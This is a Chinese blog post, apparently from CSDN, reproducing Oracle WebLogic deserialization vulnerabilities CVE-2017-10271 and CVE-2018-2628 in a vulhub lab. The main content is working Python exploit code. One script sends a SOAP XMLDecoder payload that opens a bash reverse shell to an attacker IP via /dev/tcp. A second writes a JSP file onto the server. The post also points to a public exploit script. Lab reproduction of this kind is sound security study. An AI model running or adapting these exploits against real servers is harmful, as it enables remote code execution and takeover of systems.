weblogic反序列化漏洞复现

最新推荐文章于 2024-05-13 06:09:10 发布
最新推荐文章于 2024-05-13 06:09:10 发布
阅读量322 收藏 7
点赞数 8
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45396375/article/details/135539066
版权

vulhub靶场复现
Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)

反序列化执行反弹shell命令


import requests

headers = {
    "Accept-Encoding": "gzip, deflate",
    "Accept": "*/*",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Content-Type": "text/xml",
}


data = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>bash -i &gt;&amp; /dev/tcp/192.168.66.133/4444 0&gt;&amp;1</string>
                        </void>
                    </array>
                    <void method="start"/>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
"""

requests.post(url = "http://192.168.66.102:7001/wls-wsat/CoordinatorPortType",headers=headers,data=data)

反弹成功

在这里插入图片描述

上传文件


import requests

headers = {
    "Accept-Encoding": "gzip, deflate",
    "Accept": "*/*",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Content-Type": "text/xml",
}


data = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
"""

requests.post(url = "http://192.168.66.102:7001/wls-wsat/CoordinatorPortType",headers=headers,data=data)

访问
在这里插入图片描述

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

启动一个JRMP Server,监听1099端口在这里插入图片描述
执行漏洞利用脚本 https://www.exploit-db.com/exploits/44553
在这里插入图片描述
进入容器查看命令执行成功
在这里插入图片描述

яаеил
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
weblogic反序列化.zip
07-08
简单的日常weblogic 应用的反序列化漏洞补丁方法和临时整改方法
weblogic预警及历史漏洞
a1b2c3是弱口令
10-17 1240
简介 1、 Oracle WebLogic CVE-2019-2891 漏洞预警 2、WebLogic历史漏洞回顾 1.预警 Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。 1.1预警描述 此漏洞为远程代码执行漏洞,基于全球使用该产品用...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
最新发布
2301_77121488的博客
05-13 1186
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。
weblogic反序列化
m0_67284865的博客
07-02 424
weblogic的两种反序列化:xml和wls
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 8099
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
weblogic XML反序列化
weixin_48776804的博客
05-10 359
weblogic XML反序列化
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
**一、Weblogic反序列化漏洞详解** 1. **漏洞原理**:WebLogic Server在处理某些类型的数据流时,没有正确地验证输入,这使得攻击者可以构造特殊的Java序列化对象并将其发送到服务器,从而触发远程代码执行。攻击者...
weblogic10.3.6反序列化补丁包
06-22
weblogic10.3.6.0反序列化补丁包,p20780171_1036_Generic (2).zip补丁包和p22248372_1036012_Generic.zip升级包,要先安装升级包在安装补丁包
weblogic反序列化漏洞测试jar包
02-17
weblogic反序列化漏洞测试jar包 如涉及版权问题请与我联系
java weblogic反序列化,WebLogic 反序列化漏洞(CVE-2017-10271)
weixin_39851809的博客
03-13 113
0x00 WebLogic WLS组件反序列化漏洞这个漏洞的编号是 CVE-2017-10271,漏洞存在于 Oracle WebLogic 的 wls-wsat 组件中,该组件的 XMLDecoder 方法在反序列化时存在漏洞可远程代码执行,凡是版本号 < 10.3.6 的都受到影响,刚出来时没有看,现在记录一下0x01 访问远程文件POST /wls-wsat/CoordinatorPo...
weblogic反序列化基本概念
sojrs_sec的博客
12-03 4576
如图,weblogic反序列化在利用过程中,主要考虑四个部分 Deliver_way :payload通过什么方式传入服务器 Payload:payload是什么格式,xml本身即为序列化对象,可直接反序列化。ysoserial生成的payload,为序列化文件 Write object():若非序列化数据,则首先经过writeobject()进行序列化 Readobject():反序列化数据...
Weblogic_XMLDecoder反序列化漏洞_CVE-2017-10271(未完待续)
simonnews的博客
05-14 302
Weblogic_XMLDecoder反序列化漏洞_CVE-2017-102711 漏洞概述1.1 基础知识1.2 漏洞概述1.3 影响版本2 漏洞原理分析3 漏洞复现4 漏洞修复5 其他6 参考 1 漏洞概述 1.1 基础知识 1.2 漏洞概述 1.3 影响版本 webLogic 10.3.6.0、12.1.3.0、12.2.1.1 、12.2.1.2版本 2 漏洞原理分析 调用栈 weblogic.wsee.jaxws.workcontext.WorkContextServerTube->p
Weblogic反序列化漏洞(CVE-2018-2628)实现反弹shell
Becktick的博客
04-25 2030
Weblogic反序列化漏洞(CVE-2018-2628)反弹shell 技术无罪,请勿用于恶意用途 转载请注明出处! 看见大部分复现教程都是弹计算器,创建文件夹,对于一些人来说不能满足需求,所以我准备做一个反弹shell的复现。 测试机:MacBook-Air 测试机IP:192.168.0.100 靶机IP:192.168.0.100:7001 环境: docker 工具:CVE-2018-2...
Weblogic CVE-2017-10271 XMLDecoder反序列化漏洞
读书 买花 长大
02-17 462
CVE-2017-10271
详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选
Enmotech的博客
05-28 2426
各位亲爱的用户/读者朋友们:为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了《云和恩墨技术通讯》(5月刊),通过对过去一段时间的知识回顾和故障...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值